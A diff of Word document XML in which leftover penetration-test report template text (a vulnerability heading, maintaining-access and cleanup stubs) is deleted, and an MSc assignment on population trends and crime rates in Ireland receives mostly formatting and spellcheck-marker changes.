-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:eastAsia="en-ZA"/>
-          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:miter w14:lim="400000"/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="9356" w:type="dxa"/>
-        <w:tblInd w:w="-10" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:insideH w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-        </w:tblBorders>
-        <w:shd w:val="clear" w:color="auto" w:fill="CED7E7"/>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9030"/>
-        <w:gridCol w:w="326"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:trPr>
-          <w:gridAfter w:val="1"/>
-          <w:wAfter w:w="326" w:type="dxa"/>
-          <w:trHeight w:val="11440"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9030" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-                <w:color w:val="4F81BD"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:u w:color="4F81BD"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">Vulnerability Exploited:  </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:u w:color="4F81BD"/>
-              </w:rPr>
-              <w:t>Ability Server 2.34 FTP STOR Buffer Overflow</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="11234"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9356" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="192" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-            </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc59959356"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>3.4 Sample Report – Maintaining Access</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="9"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc59959357"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.5 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>– House Cleaning</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="10"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading"/>
-        <w:spacing w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc59959358"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>4.0 Additional Items Not Mentioned in the Report</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="11"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>This section is placed in the overall report.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Machine Learning</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-        </w:rPr>
-        <w:t>Linear regression:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Linear regression is a simple but powerful model that can be used to predict continuous variables, such as population growth. It works by finding a linear relationship between the population growth and one or more independent variables, such as fertility rates, mortality rates, and migration rates.</w:t>
-      </w:r>
-    </w:p>
     <w:p/>
     <w:p/>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId26"/>
+      <w:footerReference w:type="default" r:id="rId34"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
       <w:pgBorders w:offsetFrom="page">
@@ -14721,6 +15154,155 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7A83416C"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="0AAA7DC0"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1760440869">
     <w:abstractNumId w:val="11"/>
   </w:num>
@@ -14780,6 +15362,9 @@
   </w:num>
   <w:num w:numId="20" w16cid:durableId="1897400402">
     <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="21" w16cid:durableId="1502046198">
+    <w:abstractNumId w:val="20"/>
   </w:num>
 </w:numbering>
 </file>

--- a/MSC_DA_CA1_Jose_Mario.docx
+++ b/MSC_DA_CA1_Jose_Mario.docx
@@ -2,6 +2,18 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:cs="Arial"/>
+          <w:b/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="44"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
@@ -295,12 +307,37 @@
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t>Bharathi Chakravarthi/</w:t>
+              <w:t>Bharathi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:lang w:val="pt-BR"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:lang w:val="pt-BR"/>
+              </w:rPr>
+              <w:t>Chakravarthi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:lang w:val="pt-BR"/>
+              </w:rPr>
+              <w:t>/</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -313,8 +350,17 @@
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t>Marina Iantorno</w:t>
+              <w:t xml:space="preserve">Marina </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+                <w:lang w:val="pt-BR"/>
+              </w:rPr>
+              <w:t>Iantorno</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -698,7 +744,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Exploring the Link Between Population Trends and Crime Rates in Ireland</w:t>
       </w:r>
     </w:p>
@@ -1351,7 +1396,6 @@
             <w14:miter w14:lim="400000"/>
           </w14:textOutline>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Table of Contents</w:t>
       </w:r>
     </w:p>
@@ -3225,6 +3269,7 @@
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3233,8 +3278,31 @@
                 <w:szCs w:val="16"/>
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
-              <w:t>Dún Laoghaire-Rathdown</w:t>
+              <w:t>Dún</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+                <w:lang w:eastAsia="en-IE"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Laoghaire-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+                <w:lang w:eastAsia="en-IE"/>
+              </w:rPr>
+              <w:t>Rathdown</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -5159,7 +5227,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Data Wrangling is the first step to be performed with the data. This process consists of cleaning, transforming, and manipulating the data to make it more usable for analysis. This process will be performed in a Jupyter Notebook:</w:t>
+        <w:t xml:space="preserve">Data Wrangling is the first step to be performed with the data. This process consists of cleaning, transforming, and manipulating the data to make it more usable for analysis. This process will be performed in a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Jupyter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Notebook:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5367,6 +5453,7 @@
         </w:rPr>
         <w:t>“</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5375,6 +5462,7 @@
         </w:rPr>
         <w:t>crime_df</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5391,6 +5479,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5421,7 +5510,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>rame, one</w:t>
+        <w:t>rame</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, one</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5431,6 +5529,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> ‘</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5439,6 +5538,7 @@
         </w:rPr>
         <w:t>NaN</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5488,7 +5588,53 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The method .dropna() has been used in this dataframe.</w:t>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>method .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
